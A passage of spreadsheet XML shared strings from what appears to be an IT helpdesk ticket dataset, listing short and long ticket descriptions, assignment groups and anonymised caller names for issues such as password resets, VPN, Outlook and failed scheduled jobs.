    <t>qmgspxkf mckfysdh</t>
  </si>
  <si>
    <t>server issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bgqpotek.cuxakvml@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i have been trying to gain access to my pay roll information on the hub, specifically the hr_tool etime portal. the "other" information on the portal come up without problems, but the "pay stub" does notâ€¦it continuously shows the search ring._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bgqpotek cuxakvml</t>
  </si>
  <si>
    <t>ticket update on ticket_no0454269</t>
  </si>
  <si>
    <t>unable to display expense report</t>
  </si>
  <si>
    <t>ncksqfmz fzcjunai</t>
  </si>
  <si>
    <t>password reset for upitdmhz owupktcg cruzjc</t>
  </si>
  <si>
    <t>uazkjifp dhtnevcq</t>
  </si>
  <si>
    <t>unable to login in benefits tab</t>
  </si>
  <si>
    <t>bsmjflrp bvslpafi</t>
  </si>
  <si>
    <t>hello, i'm having an issue with my outlook view.  can you call me and let me share my screen?</t>
  </si>
  <si>
    <t>ndaoxbvi szxlciue</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access mails </t>
  </si>
  <si>
    <t>cdfqvlzu jzmwuirn</t>
  </si>
  <si>
    <t>rbozivdq gmlhrtvp</t>
  </si>
  <si>
    <t>mobile device activation</t>
  </si>
  <si>
    <t xml:space="preserve">from: tvcdfqgp nrbcqwgj 
sent: friday, october 28, 2016 3:13 pm
to: nwfodmhc exurcwkm
subject:  se ha bloqueado en forma temporal la sincronizaciÃ³n de su dispositivo mÃ³vil mediante exchange activesync hasta que su administrador autorice el acceso.
hi
i received this message and our local it expert has told me to open a ticket.
</t>
  </si>
  <si>
    <t>tvcdfqgp nrbcqwgj</t>
  </si>
  <si>
    <t>internal keybankrd will not work after cs nor will an external usb keybankrd.</t>
  </si>
  <si>
    <t>hefiuwvo lcgadsef</t>
  </si>
  <si>
    <t>blank call //gso</t>
  </si>
  <si>
    <t>update on inplant_874269</t>
  </si>
  <si>
    <t>password change thru password_management_tool password manager</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jvpkulxw.ovuweygj@gmail.com_x000D_
_x000D_
hello sir,_x000D_
_x000D_
i tried to change my password thru above. i  got below error. pl help know what action to be taken further to ensure all passwords are same everywhere since belo wmsg says all passwords were not changed._x000D_
_x000D_
[cid:image001.jpg@01d2316b.5ff15980]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jvpkulxw ovuweygj</t>
  </si>
  <si>
    <t>unlock personal number in ess</t>
  </si>
  <si>
    <t>ltsqkane ycgwexdf</t>
  </si>
  <si>
    <t>intermittent service on configair server in SID_34 requires probably a restart on production server</t>
  </si>
  <si>
    <t xml:space="preserve">intermittent service on configair server in SID_34 requires probably a restart on production server. 
the error occurs in production and shows "500 internal serrver error. error: while trying to invoke the method java.util.list.iterator() of null object loaded from local variable 'local list'"
the issue can be reproduced in production e.g.:
a) company customer e.g.# 81510728 and base material mm3716934 (hss/pm finishing)
b) company customer e.g. .# 81510728 and starting from scratch. i can select a product platform e.g. hp hss/pm roughing, but the screen freezes.
c) log-on language different "en", e.g. "de". company customer e.g. 81124199; base material e.g. 5157483. 
we had this issues already several times before and it needed always a restart of the server. thryeu is a good contact person for this issue as he was already working on the root cause with our external vendor configair.
</t>
  </si>
  <si>
    <t>GRP_14</t>
  </si>
  <si>
    <t>iavozegx jpcudyfi</t>
  </si>
  <si>
    <t>unable to access vpn</t>
  </si>
  <si>
    <t>vtnkwxhr tqxrglvh</t>
  </si>
  <si>
    <t>unable to open outlook</t>
  </si>
  <si>
    <t>kcagqjyv ojhulmes</t>
  </si>
  <si>
    <t>install driver in printer hr14 in HostName_769</t>
  </si>
  <si>
    <t>bihypqsn kbaegpcd</t>
  </si>
  <si>
    <t>unable to send emails from outbox</t>
  </si>
  <si>
    <t>dijxefrq nbgykjpr</t>
  </si>
  <si>
    <t>access to business_client drawings</t>
  </si>
  <si>
    <t>name:xvgftyr tryfuh
language:
browser:microsoft internet explorer
email:cnkoflhi.abeoucfj@gmail.com
customer number:
summary:i cannot seem to access the drawings from the netweaver application that is installed on my computer.  it doesn't take me to the same page that my colleagues have.</t>
  </si>
  <si>
    <t>taking off email permissions from personal phone</t>
  </si>
  <si>
    <t>name:vdhfy
language:
browser:microsoft internet explorer
email:dcvphjru.ybomrjst@gmail.com
customer number:
summary:i have scrapped the old phone. my mail was configured in it. can you take off the permissions set to view mails on that phone</t>
  </si>
  <si>
    <t>dcvphjru ybomrjst</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/28/2016 11:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/28/2016 11:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1879 failed in job_scheduler at: 10/28/2016 11:01:00  </t>
  </si>
  <si>
    <t>unable to view payslips in ie</t>
  </si>
  <si>
    <t>bdgaxriq iltbozkw</t>
  </si>
  <si>
    <t>prtgghj4k45 password reset</t>
  </si>
  <si>
    <t xml:space="preserve">please reset hr_tool gv4536 password reset. </t>
  </si>
  <si>
    <t>channel partner receiving multiple emails from erp--- urgent</t>
  </si>
  <si>
    <t xml:space="preserve">hi,
our channel partner with the email address djhadkudhd@gmail.com, received 50 emails regarding the pos error in a matheywter of 30 milliseconds.  he is very angry, this needs to be fixed aerp.  attached is a file extracted from erp documenting the 50 emails.  </t>
  </si>
  <si>
    <t>GRP_15</t>
  </si>
  <si>
    <t>qcfmxgid jvxanwre</t>
  </si>
  <si>
    <t>usa - (company) : interface fastethernet0/16 &amp; gigabitethernet1/0/18 is down since  09:23 pm et on 09/28.</t>
  </si>
  <si>
    <t>password reset</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qtrmxlgv.dfruzvam@gmail.com
good morning,
i have forgotten my password for erp SID_1.  i have made 3 attempts and failed.  could you please reset.  my user id is dgrtrkjs123.
</t>
  </si>
  <si>
    <t>qtrmxlgv dfruzvam</t>
  </si>
  <si>
    <t>ess login issue</t>
  </si>
  <si>
    <t>ess login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ukzfqjet zcbhpweo</t>
  </si>
  <si>
    <t>unable to start dell 7350 2 in 1 device</t>
  </si>
  <si>
    <t xml:space="preserve">qifzkoej etbmgjvo is unable to start his dell 7350 2 in 1 tablet device. </t>
  </si>
  <si>
    <t>qifzkoej etbmgjvo</t>
  </si>
  <si>
    <t>erp_print_tool install.</t>
  </si>
  <si>
    <t>aorthyme rnsuipbk</t>
  </si>
  <si>
    <t>good morning. i am having trouble getting into my vpn</t>
  </si>
  <si>
    <t>name:wvngzrca sfmrzdth
language:
browser:microsoft internet explorer
email:wvngzrca.sfmrzdth@gmail.com
customer number:
summary:good morning. i am having trouble getting into my vpn
can you assist</t>
  </si>
  <si>
    <t>wvngzrca sfmrzdth</t>
  </si>
  <si>
    <t>install acrobat standard</t>
  </si>
  <si>
    <t>iefgkray zdyksvpw</t>
  </si>
  <si>
    <t>password reset from ad</t>
  </si>
  <si>
    <t>reset the password for wseacnvi azvixyqg on erp / qa / erp</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my password to SID_1. it's blocked. login  - jdhdw345 . </t>
  </si>
  <si>
    <t>wseacnvi azvixyqg</t>
  </si>
  <si>
    <t>i used to have acces to this location on collaboration_platform.  now i do not. i need access.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bwfhtumx.japznrvb@gmail.com
[cid:image001.jpg@01d230f7.8bb4e830]
bwfhtumx japznrvb 
regional controller
bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;
</t>
  </si>
  <si>
    <t>GRP_16</t>
  </si>
  <si>
    <t>bwfhtumx japznrvb</t>
  </si>
  <si>
    <t xml:space="preserve">crm add-in is getting disabled from outlook </t>
  </si>
  <si>
    <t>lrbjqcmh jbiwtzqr</t>
  </si>
  <si>
    <t>outlook hangs.</t>
  </si>
  <si>
    <t>rjsulvat uanigkqc</t>
  </si>
  <si>
    <t>vpn not working.</t>
  </si>
  <si>
    <t>reset passwords for hckvpary emxbpkwy using password_management_tool password reset.</t>
  </si>
  <si>
    <t>employee is getting an error "user authentication failed" when trying to log into the ess portal.  she is able to access erp and is able to access the hub.  tried to reset and change her password through password_management_tool password manager but got an error  "cannot find account [woodscf] on target [active directory]."
her user id is hdjdkt123</t>
  </si>
  <si>
    <t>GRP_17</t>
  </si>
  <si>
    <t>hckvpary emxbpkwy</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 10/28/2016 07:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 10/28/2016 07:41:00</t>
  </si>
  <si>
    <t>mtgujlcb kczyvpqr</t>
  </si>
  <si>
    <t>wy123 printer</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nxhwyepl.mudstbxo@gmail.com
please note some continuous erp printing is happening in printer wy123. the print is not given locally please arrange to cancel the same immediately as lot of paper is getting wasted.
</t>
  </si>
  <si>
    <t>nxhwyepl mudstbxo</t>
  </si>
  <si>
    <t>update java viewer ?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uijxpazn.gvtzlphs@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
java viewer is not working any more. i need access to view scanned inwarehouse_tools in erp._x000D_
_x000D_
i assume java update is required ?_x000D_
_x000D_
[cid:image001.png@01d2311b.deaf3cb0]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>uijxpazn gvtzlphs</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_137 failed in job_scheduler at: 10/28/2016 06:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_137 failed in job_scheduler at: 10/28/2016 06:38:00</t>
  </si>
  <si>
    <t>HostName_1297 is currently experiencing high cpu utilization. please investigate!</t>
  </si>
  <si>
    <t>we are observing below alert in monitoring_tool:_x000D_
_x000D_
HostName_1297 is currently experiencing high cpu utilization. please investigate!</t>
  </si>
  <si>
    <t>jloygrwh acvztedi</t>
  </si>
  <si>
    <t>access to bex</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yfqoaepn.xnezhsit@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
till last week i was accessing bex reports using mms portal and there were no issues._x000D_
_x000D_
starting this week the system is incredibly slow when i log in and finally does not allow me to access any reports._x000D_
_x000D_
can it be the issue with any maintenance or my access rights or rather i should try to access bex using different way?_x000D_
_x000D_
below the print screen from what i see after log in:_x000D_
[cid:image001.png@01d2310c.f184b360]_x000D_
_x000D_
i am also able to get to finance reports (see below), however when i click "profitability analysis" (as i was always doing) separate window is open however apart rom that the screen is blank._x000D_
[cid:image002.png@01d2310c.f184b360]_x000D_
_x000D_
_x000D_
i appreciate your support._x000D_
_x000D_
have a great day â˜º_x000D_
_x000D_
robhyertyj_x000D_
_x000D_
_x000D_
yfqoaepn xnezhsit_x000D_
managing director_x000D_
finance manager cee_x000D_
yfqoaepn.xnezhsit@gmail.com&lt;mailto:yfqoaepn.xnezhsit@gmail.com&gt;_x000D_
tel:+48(61)7767671_x000D_
mob:+48 694 425 760_x000D_
_x000D_
company polska sp. z o.o. , ul. krzywoustego 7, 61-144 poznaÅ„, www.company.com&lt;_x000D_
_x000D_
company polska sp. z o.o. z siedzibÄ… w polandiu, 61-144 poznaÅ„, ul. krzywoustego 7._x000D_
spÃ³Å‚ka zarejestrowana w sÄ…dzie rejonowym poznaÅ„-nowe miasto i wilda w polandiu, wydziaÅ‚ viii gospodarczy krs pod numerem 1111286691._x000D_
kapitaÅ‚ zakÅ‚adowy 100 000 pln, nip 954-20-87-982._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>yfqoaepn xnezhsit</t>
  </si>
  <si>
    <t>windows account lockout</t>
  </si>
  <si>
    <t>kcipjago mlkptgvb</t>
  </si>
  <si>
    <t>æ’¤å›ž: ticket_no1564867 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: abcdri@company.com
windy shi å°†æ’¤å›žé‚®ä»¶"ticket_no1564867 -- comments added"ã€‚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t>
  </si>
  <si>
    <t>tycludks cjofwigv</t>
  </si>
  <si>
    <t>account locked in erp SID_34</t>
  </si>
  <si>
    <t>uvwphrbl hfqdumtv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/28/2016 04:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/28/2016 04:11:00</t>
  </si>
  <si>
    <t>user needs training to use engineering tool to view drawings.</t>
  </si>
  <si>
    <t>user needs training to use engineering tool to view drawings._x000D_
-connected to the user system using teamviewer._x000D_
-help and educated the user on how login to business_client and view drawings._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>rkzqjbwc juizkwpl</t>
  </si>
  <si>
    <t>skype not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rhwvpmlq.zuwhpqrc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to access the skype . the password is showing error ._x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d2311d.d4c2e240]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rhwvpmlq zuwhpqrc</t>
  </si>
  <si>
    <t>account unlock request.</t>
  </si>
  <si>
    <t>lvxakohq tsfnhowj</t>
  </si>
  <si>
    <t xml:space="preserve">[urgent!!] delivery note creation request!! </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fbvpcytz.nokypgvx@gmail.com
hello it team,
could you please generate delivery note for below order?
we cannot issue dn for so#36199966 despite of enough stock for all of items at shipping plantâ€¦
sales org : 500000
delivery plant : plant_317
shipping point : tys12456
so#36199966
mm#6784736         1pc
mm#7415645         10pcs
mm#7415646         10pcs
[cid:image002.jpg@01d23138.6a0c5b50]
</t>
  </si>
  <si>
    <t>GRP_18</t>
  </si>
  <si>
    <t>fbvpcytz nokypgvx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_495 failed in job_scheduler at: 10/28/2016 03:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_495 failed in job_scheduler at: 10/28/2016 03:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_481 failed in job_scheduler at: 10/28/2016 02:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_481 failed in job_scheduler at: 10/28/2016 02:51:00</t>
  </si>
  <si>
    <t>woaiypxu dxslkbif</t>
  </si>
  <si>
    <t>unable to take print out from wy4678</t>
  </si>
  <si>
    <t>GRP_19</t>
  </si>
  <si>
    <t>ewiakvmz tufwrhaj</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_487 failed in job_scheduler at: 10/28/2016 02:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_487 failed in job_scheduler at: 10/28/2016 02:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">unlock supply_chain_software account </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fgehvwxb.ckxegsqv@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
would you please help me unlock my supply_chain_software account and reset my supply_chain_software password? </t>
  </si>
  <si>
    <t>fgehvwxb ckxegsqv</t>
  </si>
  <si>
    <t>unable to access password_management_tool id password manager ijeqpkrz nwtehsyx grauw</t>
  </si>
  <si>
    <t xml:space="preserve">i try to change now my password acc. to attached e-mail but this donÂ´t work. i was out of office for vacation time until now, but_x000D_
password_management_tool link donÂ´t work - please help_x000D_
_x000D_
_x000D_
_x000D_
your password expires in 13 day(s) _x000D_
_x000D_
the requirement to change your password every 90 days enhances data security within company. _x000D_
_x000D_
please login to _x000D_
a step-by-step guide on using the self-service tool is available here: _x000D_
_x000D_
please do not reply to this email. if you require assistance, please submit a ticket to the global support center via any of these modes: _x000D_
_x000D_
ticketing_tool: _x000D_
email: help@company.com _x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>GRP_2</t>
  </si>
  <si>
    <t>ijeqpkrz nwtehsyx</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_957fail failed in job_scheduler at: 10/28/2016 02:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_957fail failed in job_scheduler at: 10/28/2016 02:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to erp SID_34 </t>
  </si>
  <si>
    <t>bioanvcz zgfiahyo</t>
  </si>
  <si>
    <t>crm license for user dfgry</t>
  </si>
  <si>
    <t xml:space="preserve">from: xdvwitpm zscxqdhoalaramdntyan 
sent: friday, october 28, 2016 9:40 am
to: 'help@company.com'
cc: xyculgav cuqptoah
subject: fw: crm license for dfgry
hello,
crm is not installed in my laptop.
please support me on this.
</t>
  </si>
  <si>
    <t>xdvwitpm zscxqdho</t>
  </si>
  <si>
    <t>aljbtwsh lepkbgix</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/28/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/28/2016 01:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">windows account locked </t>
  </si>
  <si>
    <t>apply for mobile phone access to mail box</t>
  </si>
  <si>
    <t>hygiajzb ajvmhbsr</t>
  </si>
  <si>
    <t>data not correctly pulled for all the employees in the travel_tool attendee interface.</t>
  </si>
  <si>
    <t>GRP_20</t>
  </si>
  <si>
    <t>é’å²›å…´åˆæœºç”µshipment notificationé‚®ç®±è®¾ç½®</t>
  </si>
  <si>
    <t xml:space="preserve">from:  
sent: friday, october 28, 2016 7:20 am
to: nwfodmhc exurcwkm
subject: re: é’å²›å…´åˆæœºç”µshipment notificationé‚®ç®±è®¾ç½®
dearï¼Œ
pls help to update customer 4563729890 shipment notification email address :  abcdegy@gmail.com 
b. </t>
  </si>
  <si>
    <t>yafxlpwi lhxvatkb</t>
  </si>
  <si>
    <t>to recover folder that by mistake copied to x:\ drive</t>
  </si>
  <si>
    <t xml:space="preserve">i want recover folder_x000D_
</t>
  </si>
  <si>
    <t>pbtauqyx civyxdkl</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 10/27/2016 22:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 10/27/2016 22:08:00</t>
  </si>
  <si>
    <t>network outage: india: site hard down since at 8:34 pm et on 10/27. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______8:34 pm et on 10/27_______________x000D_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_no_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____na___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _na______     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ____na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>password reset request</t>
  </si>
  <si>
    <t>nyscufdq wjtcsahz</t>
  </si>
  <si>
    <t>user is not able to see all text in mails on his iphone</t>
  </si>
  <si>
    <t>yaxrnmsz bultagqx</t>
  </si>
  <si>
    <t xml:space="preserve">password reset </t>
  </si>
  <si>
    <t>ptaerwvk ibvpucyn</t>
  </si>
  <si>
    <t>unable to sync all mails in outlook on wifi</t>
  </si>
  <si>
    <t>crm tab does not appear on outlook</t>
  </si>
  <si>
    <t>unable to submit expense report as it is locked by user</t>
  </si>
  <si>
    <t>pvbomqht smfkuhwi</t>
  </si>
  <si>
    <t>titcket update on inplant_874008</t>
  </si>
  <si>
    <t>i need to approve the new product requests below</t>
  </si>
  <si>
    <t>GRP_21</t>
  </si>
  <si>
    <t>uyrpdvoq mbzevtcx</t>
  </si>
  <si>
    <t>ticket update on inplant_873870</t>
  </si>
  <si>
    <t>changed desktop wallpaper</t>
  </si>
  <si>
    <t>aqdjcuhn lagfitkz</t>
  </si>
  <si>
    <t>unable to open website</t>
  </si>
  <si>
    <t xml:space="preserve">
name:xbdht yrjhd
language:
browser:microsoft internet explorer
email:aqjdvexo.lmedazjo@gmail.com
customer number:
summary: benefit advisor will not run in my browser.</t>
  </si>
  <si>
    <t>aqjdvexo lmedazjo</t>
  </si>
  <si>
    <t>msd crm</t>
  </si>
  <si>
    <t>assign crm and e4 license to nyrjkctu tbhkenlo-  use profile like qmglkaru qiwhfkdv.</t>
  </si>
  <si>
    <t>GRP_22</t>
  </si>
  <si>
    <t>qmglkaru qiwhfkdv</t>
  </si>
  <si>
    <t>sound</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: udetjzmn.ayueswcm@gmail.com_x000D_
_x000D_
good afternoon_x000D_
_x000D_
i am having issues again with my notebook in that i cannot get any sound and cannot participate in skype calls._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>udetjzmn ayueswcm</t>
  </si>
  <si>
    <t>need the username to submit the insurance</t>
  </si>
  <si>
    <t>kamtroxv oequfsky</t>
  </si>
  <si>
    <t xml:space="preserve">query on external browser </t>
  </si>
  <si>
    <t>crkdjbot qiztrxne</t>
  </si>
  <si>
    <t>unable to access benefits and other apps in hr_tool one time</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access benefits and other apps in hr_tool one time. access denied. </t>
  </si>
  <si>
    <t>batsxwnl ashkzvnr</t>
  </si>
  <si>
    <t>unable to see the current course in ethics</t>
  </si>
  <si>
    <t xml:space="preserve">unable to see the current course in ethics
user id - bdtryh3456
</t>
  </si>
  <si>
    <t>GRP_23</t>
  </si>
  <si>
    <t>ajgnibkx zixmcjgu</t>
  </si>
  <si>
    <t>user clicked on driver update manually and then after restarting the machine he's receivng a error</t>
  </si>
  <si>
    <t xml:space="preserve">user clicked on driver update manually and then after restarting the machine he received an error stating pnp_detected_fatal_error </t>
  </si>
  <si>
    <t>erp SID_37 account unlock</t>
  </si>
  <si>
    <t>mfeyouli ndobtzpw</t>
  </si>
  <si>
    <t>windows password reset</t>
  </si>
  <si>
    <t>gtxuamif pamxszek</t>
  </si>
  <si>
    <t>telephone number update</t>
  </si>
  <si>
    <t>ufpkvlyn bozthrie</t>
  </si>
  <si>
    <t>insurance information</t>
  </si>
  <si>
    <t>gxvhauic zogmauli</t>
  </si>
  <si>
    <t>please give chrtyad345 access to reporting_tool ltaballotcsalesemp  and map him to thrdy tgyu team as an ae in the virtual table</t>
  </si>
  <si>
    <t>icqleypr kneoblzd</t>
  </si>
  <si>
    <t>loud noise // gso</t>
  </si>
  <si>
    <t>ess kiosk user password reset</t>
  </si>
  <si>
    <t>network outage  - warehouse: node company-ups-vpn-rtr is down 10/27/2016 9:54 am</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______10/27/2016 9:54 am_______________x000D_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</si>
  <si>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aw: ticket_no1561075 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: repyzajo.lxfwopyq@gmail.com
hi ,
i have uacyltoe hxgayczeed in SID_1 and it works now correctly.
the accounting documents were generated automatically without any errors.
i am approving the change.
[cid:image001.png@01d23073.3ecd7430]
best </t>
  </si>
  <si>
    <t>repyzajo lxfwopyq</t>
  </si>
  <si>
    <t>erp SID_34 account unlock</t>
  </si>
  <si>
    <t>export shipment of grinding mahcine to khdgd1234, apac - advance information</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rdfjsawg.zpmxgdcw@gmail.com
from: hdytrkfiu
sent: thursday, october 27, 2016 4:46 pm
to: &lt;rfqhoaky.rncspbot@gmail.com&gt;; &lt;ikxjfnml.kaocbpfr@gmail.com&gt;; &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;
cc:  &lt;tshljagr.mhyiopxr@gmail.com&gt;; &lt;zgmdster.bdvcealj@gmail.com&gt;; xjzcbgnp vfkwscao &lt;xjzcbgnp.vfkwscao@gmail.com&gt;; &lt;avurmegj.pxgmjynu@gmail.com&gt;
subject: export shipment of grinding mahcine to khdgd1234, apac - advance information
we are pushixepyfbga wtqdyoin for dispatching an grinding machine to khdgd1234, apac tomorrow.    this is just for your advance information.   once everything is in place, we will seek your support in your areas to help us in clearing this consignment tomorrow 28.10.16.   </t>
  </si>
  <si>
    <t xml:space="preserve">please add my work phone number to my profile </t>
  </si>
  <si>
    <t xml:space="preserve">contact phone </t>
  </si>
  <si>
    <t>jondkicb yahtgpuv</t>
  </si>
  <si>
    <t xml:space="preserve">adding members to dl </t>
  </si>
  <si>
    <t>adding members to dl</t>
  </si>
  <si>
    <t>msarjyhi fpxdbeno</t>
  </si>
  <si>
    <t>java issue on uacyltoe hxgaycze laptop.</t>
  </si>
  <si>
    <t>akhdmgwt yhgpafqx</t>
  </si>
  <si>
    <t>support fÃ¼r fa.gstry \arexjftu ohxdwngl</t>
  </si>
  <si>
    <t>support fÃ¼r fa.konnica \arexjftu ohxdwngl</t>
  </si>
  <si>
    <t>GRP_24</t>
  </si>
  <si>
    <t>arexjftu ohxdwngl</t>
  </si>
  <si>
    <t>probleme mit bluescreen .</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
es ist erneut passiert. der pc hat sich zum wiederholten male aufgehÃ¤ngt und mir lediglich einen blauen bildschirm mit weisser schrift prÃ¤sentiert.
was kÃ¶nnen wir da machen?
</t>
  </si>
  <si>
    <t>vrfpyjwi nzhvgqiw</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/27/2016 09:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/27/2016 09:54:00</t>
  </si>
  <si>
    <t>EU_tool crashes when confirmations are deleted - not able to remove scrap confirmations that have been rectified in erp</t>
  </si>
  <si>
    <t>GRP_25</t>
  </si>
  <si>
    <t>mlckvyfq aonlxvwb</t>
  </si>
  <si>
    <t>enable bgdxitwu dhcopwxa' active directory account</t>
  </si>
  <si>
    <t>enable bgdxitwu dhcopwxa' active directory account
name:fdgrty
email:kybgepnj.idszleru@gmail.com
summary:i need bgdxitwu dhcopwxa's active directory account enabled.</t>
  </si>
  <si>
    <t>kcwqdeob jwtpkzub</t>
  </si>
  <si>
    <t>sync emails issue</t>
  </si>
  <si>
    <t>wjkzgyxh pktcqbxu</t>
  </si>
  <si>
    <t>internet explorer issues</t>
  </si>
  <si>
    <t>user is having issues with his internet explorer. the page keeps refreshing and ends up with a dll error.</t>
  </si>
  <si>
    <t>pbrmgyzo hzoxdijn</t>
  </si>
  <si>
    <t xml:space="preserve">blank call </t>
  </si>
  <si>
    <t>unable to view payslips</t>
  </si>
  <si>
    <t>customer not getting order acknowledgements automatically</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ourhmqta.tjwnqexo@gmail.com
two customer accounts have not been getting the order acknowledgements automatically like they have been for the past 10 years. both are under the same top parent
accts 81184926657 and 81862217657 should automatically be sending acknowledgements to   hdyrugdty@gmail.com
since october 14'th they have not been getting them.
can someone look into this?  this is affecting the customer paying the bills, as they use this acknowledgement as a receiver so they can pay the bill.
senior sales engineer
company, inc
ourhmqta.tjwnqexo@gmail.com
</t>
  </si>
  <si>
    <t>kgqpwvzu rkexzwlh</t>
  </si>
  <si>
    <t>production order locked.</t>
  </si>
  <si>
    <t>production order 226061609 is locked by user, gtxuamif pamxszek. no one has been able to unlock. can this order be unlocked?
inspection lot 040001149576588 is being processed by gtxuamif pamxszek</t>
  </si>
  <si>
    <t>aqgphjbc utjrsedy</t>
  </si>
  <si>
    <t>i need access to finance section of hub</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bwfhtumx.japznrvb@gmail.com
i could always get into the finance section, and now i can't.  i need access, please.
[cid:image001.jpg@01d2302e.562bddf0]
bwfhtumx japznrvb
regional controller
bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;
</t>
  </si>
  <si>
    <t>jfsmwpny klxsdqiw</t>
  </si>
  <si>
    <t>i've received the message below. can you tell me from whom the email mentioned was sent ?</t>
  </si>
  <si>
    <t>GRP_26</t>
  </si>
  <si>
    <t>xawlkiey demjqrfl</t>
  </si>
  <si>
    <t>email address confirmation</t>
  </si>
  <si>
    <t>fyokahtw sidurjge</t>
  </si>
  <si>
    <t>erp pi and msd crm connectivity issue- serirtce certificate renewal</t>
  </si>
  <si>
    <t xml:space="preserve">hi all
